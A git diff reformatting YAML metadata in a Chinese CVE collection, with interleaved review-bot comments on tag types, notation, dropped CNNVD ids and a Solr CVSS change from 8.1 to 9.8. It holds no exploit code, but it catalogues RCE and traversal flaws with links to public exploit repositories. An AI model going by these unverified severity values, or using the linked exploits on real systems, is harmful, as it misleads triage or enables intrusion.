diff --git a/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml b/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml
index 84888dbf..5908596e 100644
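Review bot: Replacing the `tags` sequence with `tags: 不安全的默认资源初始化, 弱口令要求, 远程代码执行` changes the value's type from a list to one string containing commas, so a loader that iterates over tags now sees a single item and has to split on `, ` itself. A flow sequence keeps the one-line layout the commit is after while preserving the list type: `tags: [不安全的默认资源初始化, 弱口令要求, 远程代码执行]`. The same applies to the CVE-2017-9805, CVE-2018-11776 and CVE-2019-0230 hunks further down, and the `cve2021, Apache, ...` values touched in the Httpd and Solr hunks are scalars of the same kind. Several of these files also still end without a trailing newline after this format pass (`\ No newline at end of file` survives on the new side).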
--- a/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml
+++ b/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml
@@ -8,11 +8,10 @@ info:
 description: |
 Apache HTTP Server 2.4.20版本至2.4.43版本中存在安全漏洞,攻击者可借助‘Cache-Digest’标头中带有特制值的HTTP/2请求利用该漏洞造成Push Diary崩溃。
 scope-of-influence:
- Apache HTTP = 2.4.20-2.4.43
+ 2.4.20 ≤ Apache HTTP ≤ 2.4.43
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2020-9490
 - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490
-
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
 cvss-score: 7.5
diff --git a/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml
index 48a8205e..0fd3ca93 100644
--- a/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml
+++ b/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml
@@ -17,4 +17,4 @@ info:
 cwe-id: CWE-22
 cnvd-id: None
 kve-id: None
- tags: cve2021,Apache,目录遍历
\ No newline at end of file
+ tags: cve2021, Apache, 目录遍历
\ No newline at end of file
diff --git a/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml
index 25ad6322..87bc94c6 100644
--- a/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml
+++ b/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml
@@ -6,7 +6,7 @@ info:
 description: |
 Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。
 scope-of-influence:
- Apache HTTP = 2.4.49, Apache HTTP = 2.4.50
+ 2.4.49 ≤ Apache HTTP ≤ 2.4.50
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2021-42013
 - https://httpd.apache.org/security/vulnerabilities_24.html
@@ -17,4 +17,4 @@ info:
 cwe-id: CWE-22
 cnvd-id: None
 kve-id: None
- tags: cve2021,Apache,目录遍历,RCE
\ No newline at end of file
+ tags: cve2021, Apache, 目录遍历, RCE
\ No newline at end of file
diff --git a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml
index 16b59c30..dc2f24c5 100644
--- a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml
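Review bot: The new scope lines `2.4.20 ≤ Apache HTTP ≤ 2.4.43` (CVE-2020-9490) and `2.4.49 ≤ Apache HTTP ≤ 2.4.50` (CVE-2021-42013) use the Unicode `≤` character, whereas every other scope rewritten in this commit uses ASCII `<` (`Froxlor < 2.0.8`, `InfluxData InfluxDB < 1.7.6`, `Apache Shiro < 1.9.1`). A format-normalisation pass should settle on one notation, and ASCII is the safer choice for grep-based tooling and for anyone typing a query against these files. Inclusive bounds read as `2.4.20 <= Apache HTTP <= 2.4.43` and `2.4.49 <= Apache HTTP <= 2.4.50`.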
+++ b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml @@ -5,7 +5,6 @@ info: severity: critical description: CVE-2021-26295漏洞由RMI反序列化造成的远程代码执行漏洞,攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。 - scope-of-influence: Apache OFBiz < 17.12.06 reference: diff --git a/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml index 12fb0f1a..702f229f 100644 --- a/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml +++ b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml @@ -6,7 +6,7 @@ info: description: | 在Apache Shiro中,RegexRequestMatcher可以被错误配置为在某些servlet容器上被绕过。应用程序使用RegExPatternMatcher和正则表达式中的'.'可能容易受到旁路授权的攻击。 scope-of-influence: - Apache Shiro 1.9.1之前 + Apache Shiro < 1.9.1 reference: - https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh - https://nvd.nist.gov/vuln/detail/CVE-2022-32532 @@ -14,10 +14,10 @@ info: - https://cxsecurity.com/cveshow/CVE-2022-32532/ - https://vigilance.fr/vulnerability/Oracle-Fusion-Middleware-vulnerabilities-of-October-2022-39612 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-32532 cwe-id: CWE-863 - cnvd-id: CNNVD-202206-2750 + cnvd-id: None kve-id: None tags: 旁路授权 \ No newline at end of file diff --git a/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml b/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml index 4b8f08c3..e1ca89c0 100644 --- a/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml +++ b/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml @@ -16,5 +16,4 @@ info: cwe-id: CWE-502 cnvd-id: None kve-id: None - tags: - - 远程命令执行 \ No newline at end of file + tags: 远程命令执行 \ No newline at end of file diff --git a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml index d66c1fe0..8ff102a1 100644 --- a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml +++ b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml 
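Review bot: In the CVE-2022-32532 hunk `cnvd-id: CNNVD-202206-2750` becomes `cnvd-id: None`, which discards the identifier rather than relocating it: the value was a CNNVD id sitting in the CNVD field, so it did not belong there, but the cross-reference is now gone from the record. If the schema has no field for CNNVD ids, keep the id among the `reference` entries or add a dedicated key (placeholder `cnnvd-id`) so it is not lost. The Solr hunk in the next file section (CVE-2021-27905, `CNNVD-202104-914`) drops its id the same way.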
@@ -16,5 +16,4 @@ info: cwe-id: CWE-20 cnvd-id: None kve-id: None - tags: - - 远程命令执行 \ No newline at end of file + tags: 远程命令执行 \ No newline at end of file diff --git a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml index e1e4a6e8..d33a68ae 100644 --- a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml +++ b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml @@ -20,5 +20,4 @@ info: cwe-id: CWE-1321 cnvd-id: None kve-id: None - tags: - - 远程命令执行 + tags: 远程命令执行 diff --git a/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml b/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml index b10e9d5a..c47208c8 100644 --- a/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml +++ b/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml @@ -2,7 +2,7 @@ id: CVE-2021-27905 source: https://github.com/Henry4E36/Solr-SSRF info: name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 - severity: high + severity: Critical description: Apache Solr 8.8.2之前版本存在代码问题漏洞,攻击者可利用masterUrl参数将索引数据复制到本地内核中。 scope-of-influence: @@ -11,9 +11,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 - https://security.netapp.com/advisory/ntap-20210611-0009/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.1 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-27905 - cnvd-id: CNNVD-202104-914 + cwe-id: CWE-918 + cnvd-id: None kve-id: None - tags: cve2021,Apache,Solr,SSRF + tags: cve2021, Apache, Solr, SSRF diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml index a8c37b12..c9e57971 100644 --- a/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml +++ b/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml 
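Review bot: The Solr hunk sets `severity: Critical` with a capital C, while every other severity in this commit is lowercase (`severity: high`, and `severity: critical` in the Tomcat CVE-2020-1938 hunk that follows); a case-sensitive filter on severity would miss this entry, so it should read `severity: critical`. The same hunk also changes the CVSS vector from `AC:H` to `AC:L` and the score from 8.1 to 9.8 and adds `cwe-id: CWE-918`, which are data corrections rather than format changes and deserve a mention in the commit message, with the source of the new values, so they are not mistaken for a restyle.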
@@ -15,7 +15,7 @@ info: - https://blog.redteam-pentesting.de/2020/websocket-vulnerability-tomcat/ - https://lists.apache.org/thread.html/rd48c72bd3255bda87564d4da3791517c074d94f8a701f93b85752651%40%3Cannounce.tomcat.apache.org%3E classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2020-13935 cwe-id: CWE-835 diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml index 38a9cc6c..0f7d54ed 100644 --- a/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml +++ b/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml @@ -1,7 +1,7 @@ id: CVE-2020-1938 source: https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat info: - name: Java 是目前 Web 开发中主流的编程语言,而 Tomcat 是当前流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。 + name: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 severity: critical description: Ghostcat(幽灵猫) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。 diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml index e4cf2843..ccee2312 100644 --- a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml +++ b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml @@ -1,7 +1,7 @@ id: CVE-2020-9484 source: https://github.com/RepublicR0K/CVE-2020-9484 info: - name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。 + name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。 severity: high description: 当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。 
diff --git a/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml b/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml index 869c3135..9d0a4149 100644 --- a/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml +++ b/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml @@ -1,7 +1,7 @@ id: CVE-2022-29885 source: https://github.com/quynhlab/CVE-2022-29885 info: - name: Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。Apache Tomcat存在资源管理错误漏洞。攻击者利用该漏洞通过 EncryptInterceptor 导致 Apache Tomcat 过载,从而触发拒绝服务。 + name: Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 severity: high description: 当Tomcat开启集群配置,且通过NioReceiver通信时,无论服务端是否配置EncryptInterceptor,攻击者均可构造特制请求导致目标服务器拒绝服务。 diff --git a/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml b/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml index 7cd008cb..9ec1f93a 100644 --- a/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml +++ b/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml @@ -1,6 +1,5 @@ id: CVE-2020-13942 -source: - None +source: None info: name: Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月提交给了 Apache 孵化器。 severity: critical diff --git a/cve/confluence/2019/yaml/CVE-2019-3394.yaml b/cve/confluence/2019/yaml/CVE-2019-3394.yaml index b79454ab..00527937 100644 --- a/cve/confluence/2019/yaml/CVE-2019-3394.yaml +++ b/cve/confluence/2019/yaml/CVE-2019-3394.yaml @@ -1,6 +1,5 @@ id: CVE-2019-3394 -source: - none +source: none info: name: Atlassian Confluence Server是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。Confluence Data Center是Confluence Center的数据中心版本。 severity: high diff --git a/cve/confluence/2019/yaml/CVE-2019-3396.yaml b/cve/confluence/2019/yaml/CVE-2019-3396.yaml index e91ff6d3..8cbe8d8e 100644 --- a/cve/confluence/2019/yaml/CVE-2019-3396.yaml +++ b/cve/confluence/2019/yaml/CVE-2019-3396.yaml 
@@ -1,5 +1,5 @@ id: CVE-2019-3396 -source: +source: https://github.com/Yt1g3r/CVE-2019-3396_EXP info: name: Confluence是一个专业的企业知识管理与协同软件,可用于构建企业wiki。 severity: critical @@ -20,4 +20,4 @@ info: cwe-id: CWE-22 cnvd-id: None kve-id: None - tags: RCE,cve2019,任意文件读取 \ No newline at end of file + tags: RCE, cve2019, 任意文件读取 \ No newline at end of file diff --git a/cve/confluence/2021/yaml/CVE-2021-26084.yaml b/cve/confluence/2021/yaml/CVE-2021-26084.yaml index ae6294f5..c90bd51e 100644 --- a/cve/confluence/2021/yaml/CVE-2021-26084.yaml +++ b/cve/confluence/2021/yaml/CVE-2021-26084.yaml @@ -47,4 +47,4 @@ info: cwe-id: CWE-74 cnvd-id: None kve-id: None - tags: RCE,cve2021,OGNI注入 \ No newline at end of file + tags: RCE, cve2021, OGNI注入 \ No newline at end of file diff --git a/cve/confluence/2022/yaml/CVE-2022-26134.yaml b/cve/confluence/2022/yaml/CVE-2022-26134.yaml index 76029829..0c760728 100644 --- a/cve/confluence/2022/yaml/CVE-2022-26134.yaml +++ b/cve/confluence/2022/yaml/CVE-2022-26134.yaml @@ -24,4 +24,4 @@ info: cwe-id: CWE-74 cnvd-id: None kve-id: None - tags: RCE,cve2022 \ No newline at end of file + tags: RCE, cve2022 \ No newline at end of file diff --git a/cve/confluence/2022/yaml/CVE-2022-26138.yaml b/cve/confluence/2022/yaml/CVE-2022-26138.yaml index d399d06b..9b39b96c 100644 --- a/cve/confluence/2022/yaml/CVE-2022-26138.yaml +++ b/cve/confluence/2022/yaml/CVE-2022-26138.yaml @@ -1,6 +1,5 @@ id: CVE-2022-26138 -source: - https://github.com/shavchen/CVE-2022-26138 +source: https://github.com/shavchen/CVE-2022-26138 info: name: Confluence是atlassian公司的产品,是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。 severity: critical @@ -20,4 +19,4 @@ info: cwe-id: CWE-798 cnvd-id: None kve-id: None - tags: RCE,cve2022 \ No newline at end of file + tags: RCE, cve2022 \ No newline at end of file diff --git a/cve/django/2021/yaml/CVE-2021-31542.yaml b/cve/django/2021/yaml/CVE-2021-31542.yaml index f4db55bd..d70c7c63 100644 --- a/cve/django/2021/yaml/CVE-2021-31542.yaml 
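Review bot: The tag `OGNI注入` on the new side of the CVE-2021-26084 hunk is a typo that this format pass keeps; the vulnerability is OGNL expression injection (consistent with `cwe-id: CWE-74`), so the line should read `tags: RCE, cve2021, OGNL注入`. A misspelled tag makes the entry invisible to anyone filtering the corpus by `OGNL`, which is the natural search term for this CVE.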
+++ b/cve/django/2021/yaml/CVE-2021-31542.yaml @@ -1,6 +1,5 @@ id: CVE-2021-31542 -source: - https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Django/CVE-2021-31542.md +source: https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Django/CVE-2021-31542.md info: name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 severity: high diff --git a/cve/django/2022/yaml/CVE-2022-28346.yaml b/cve/django/2022/yaml/CVE-2022-28346.yaml index 739255ff..4a569da5 100644 --- a/cve/django/2022/yaml/CVE-2022-28346.yaml +++ b/cve/django/2022/yaml/CVE-2022-28346.yaml @@ -1,6 +1,5 @@ id: CVE-2022-28346 -source: - https://github.com/DeEpinGh0st/CVE-2022-28346 +source: https://github.com/DeEpinGh0st/CVE-2022-28346 info: name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 severity: critical diff --git a/cve/django/2022/yaml/CVE-2022-34265.yaml b/cve/django/2022/yaml/CVE-2022-34265.yaml index ff899811..48efa4d1 100644 --- a/cve/django/2022/yaml/CVE-2022-34265.yaml +++ b/cve/django/2022/yaml/CVE-2022-34265.yaml @@ -1,6 +1,5 @@ id: CVE-2022-34265 -source: - https://github.com/aeyesec/CVE-2022-34265 +source: https://github.com/aeyesec/CVE-2022-34265 info: name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 severity: critical diff --git a/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md b/cve/docker/2019/CVE-2019-16884/ReadMe.md similarity index 100% rename from cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md rename to cve/docker/2019/CVE-2019-16884/ReadMe.md 
diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/docker/2019/yaml/CVE-2019-16884.yaml similarity index 70% rename from cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml rename to cve/docker/2019/yaml/CVE-2019-16884.yaml index 0f38b714..5cd9d93f 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml +++ b/cve/docker/2019/yaml/CVE-2019-16884.yaml @@ -1,7 +1,7 @@ id: CVE-2019-16884 source: https://github.com/teamssix/TWiki/blob/c0252efe2cca4b9f750b921ce390af0d9667aca8/docs/CloudNative/Docker/CVE-2019-16884.md info: - name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux. + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 severity: high description: | runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory @@ -12,11 +12,11 @@ info: Red Hat OpenShift Container Platform 4.2 Red Hat OpenShift Container Platform 3.9 reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884 - - https://usn.ubuntu.com/usn/usn-4297-1 - - https://security.netapp.com/advisory/ntap-20220221-0004/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884 + - https://usn.ubuntu.com/usn/usn-4297-1 + - https://security.netapp.com/advisory/ntap-20220221-0004/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2019-16884 cwe-id: CWE-863 diff --git a/cve/docker/2019/yaml/CVE-2019-5736.yaml b/cve/docker/2019/yaml/CVE-2019-5736.yaml index fefd75ac..ac62cd4c 100644 --- a/cve/docker/2019/yaml/CVE-2019-5736.yaml +++ b/cve/docker/2019/yaml/CVE-2019-5736.yaml 
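Review bot: The rewritten `name:` line in the CVE-2019-16884 hunk describes the Linux kernel, but the `description:` in the same hunk places the flaw in runc (`libcontainer/rootfs_linux.go`, "as used in Docker through 19.03.2-ce") and the file is being moved from `cve/linux-kernel` to `cve/docker`, so the product summary now contradicts both. Since the move is exactly what corrects the product attribution, the name should follow it, e.g. `name: runc是Open Container Initiative的容器运行时,Docker等产品使用它创建和运行容器。`. The other files in this patch use the name field for the affected product, so leaving a kernel description here is misleading for anyone triaging by product.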
@@ -10,7 +10,7 @@ info: RunC version <=1.0-rc6 reference: - https://www.4hou.com/vulnerable/16361.html - - https://github.com/Frichetten/CVE-2019-5736-PoC\ + - https://github.com/Frichetten/CVE-2019-5736-PoC classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-score: 8.6 @@ -18,4 +18,4 @@ info: cwe-id: CWE-78 cnvd-id: None kve-id: None - tags: cve2019,docker.runc \ No newline at end of file + tags: cve2019, docker.runc \ No newline at end of file diff --git a/cve/fortinac/2022/yaml/CVE-2022-39952.yaml b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml index 98f30f02..6774e501 100644 --- a/cve/fortinac/2022/yaml/CVE-2022-39952.yaml +++ b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml @@ -19,7 +19,7 @@ info: - https://www.fortiguard.com/psirt/FG-IR-22-300 - https://nvd.nist.gov/vuln/detail/CVE-2022-39952 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-39952 cwe-id: CWE-610 diff --git a/cve/gitlab/2021/yaml/CVE-2021-22205.yaml b/cve/gitlab/2021/yaml/CVE-2021-22205.yaml index e3d36c9d..3ef4584f 100644 --- a/cve/gitlab/2021/yaml/CVE-2021-22205.yaml +++ b/cve/gitlab/2021/yaml/CVE-2021-22205.yaml @@ -19,4 +19,4 @@ info: cwe-id: CWE-94 cnvd-id: None kve-id: None - tags: RCE,cve2021,gitlab \ No newline at end of file + tags: RCE, cve2021, gitlab \ No newline at end of file diff --git a/cve/gitlab/2021/yaml/CVE-2021-22214.yaml b/cve/gitlab/2021/yaml/CVE-2021-22214.yaml index 37a69cb5..1ba01452 100644 --- a/cve/gitlab/2021/yaml/CVE-2021-22214.yaml +++ b/cve/gitlab/2021/yaml/CVE-2021-22214.yaml @@ -14,7 +14,7 @@ info: - https://www.tenable.com/plugins/nessus/152483 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22214 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2021-22214 cwe-id: CWE-918 
diff --git a/cve/gitlab/2022/yaml/CVE-2022-1162.yaml b/cve/gitlab/2022/yaml/CVE-2022-1162.yaml index 7d7575e2..3baa322f 100644 --- a/cve/gitlab/2022/yaml/CVE-2022-1162.yaml +++ b/cve/gitlab/2022/yaml/CVE-2022-1162.yaml @@ -19,4 +19,4 @@ info: cwe-id: CWE-798 cnvd-id: None kve-id: None - tags: UseOfHardCodedPassword,cve2022,gitlab \ No newline at end of file + tags: UseOfHardCodedPassword, cve2022, gitlab \ No newline at end of file diff --git a/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml index 430b5e70..ba1e0879 100644 --- a/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml +++ b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml @@ -1,6 +1,5 @@ id: CVE-2022-22978 -source: - https://github.com/DeEpinGh0st/CVE-2022-22978 +source: https://github.com/DeEpinGh0st/CVE-2022-22978 info: name: Spring Security是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架。 severity: critical @@ -13,7 +12,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-22978 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22978 cwe-id: CWE-863, CWE-285 diff --git a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml index c6b5f608..6cc798ff 100644 --- a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml +++ b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml @@ -1,6 +1,5 @@ id: CVE-2017-8046 -source: - https://github.com/m3ssap0/spring-break_cve-2017-8046 +source: https://github.com/m3ssap0/spring-break_cve-2017-8046 info: name: Spring框架是 Java 平台的一个开源的全栈(full-stack)应用程序框架和控制反转容器实现,一般被直接称为 Spring。 severity: high 
@@ -12,7 +11,7 @@ info: reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-8046 cwe-id: CWE-20 diff --git a/cve/java-spring/2020/yaml/CVE-2020-5398.yaml b/cve/java-spring/2020/yaml/CVE-2020-5398.yaml index ef202c2e..0838f504 100644 --- a/cve/java-spring/2020/yaml/CVE-2020-5398.yaml +++ b/cve/java-spring/2020/yaml/CVE-2020-5398.yaml @@ -1,6 +1,5 @@ id: CVE-2020-5398 -source: - https://github.com/motikan2010/CVE-2020-5398 +source: https://github.com/motikan2010/CVE-2020-5398 info: name: Spring框架是 Java 平台的一个开源的全栈(full-stack)应用程序框架和控制反转容器实现,一般被直接称为 Spring。 severity: high @@ -14,7 +13,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-5398 - https://pivotal.io/security/cve-2020-5398 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.5 cve-id: CVE-2020-5398 cwe-id: CWE-494, CWE-79 diff --git a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml index 496e1ad2..251d88ac 100644 --- a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml +++ b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml @@ -4,7 +4,8 @@ info: name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 severity: critical description: Spring Cloud Function是基于 Spring Boot 的函数框架。由于 Spring Cloud Function 对用户输入的参数安全处理不严,未授权的攻击者可构造特定的数据包,通过特定的 HTTP 请求头进行 SpEL 表达式注入攻击,从而可执行任意的恶意 Java 代码,获取服务权限。 - scope-of-influence: Spring Cloud Function<3.1.7 + scope-of-influence: + Spring Cloud Function<3.1.7 reference: - https://github.com/dinosn/CVE-2022-22963 - https://avd.aliyun.com/search?q=CVE-2022-22963 diff --git a/cve/java-spring/2022/yaml/CVE-2022-22965.yaml b/cve/java-spring/2022/yaml/CVE-2022-22965.yaml index e237d738..c7aca8ce 100644 
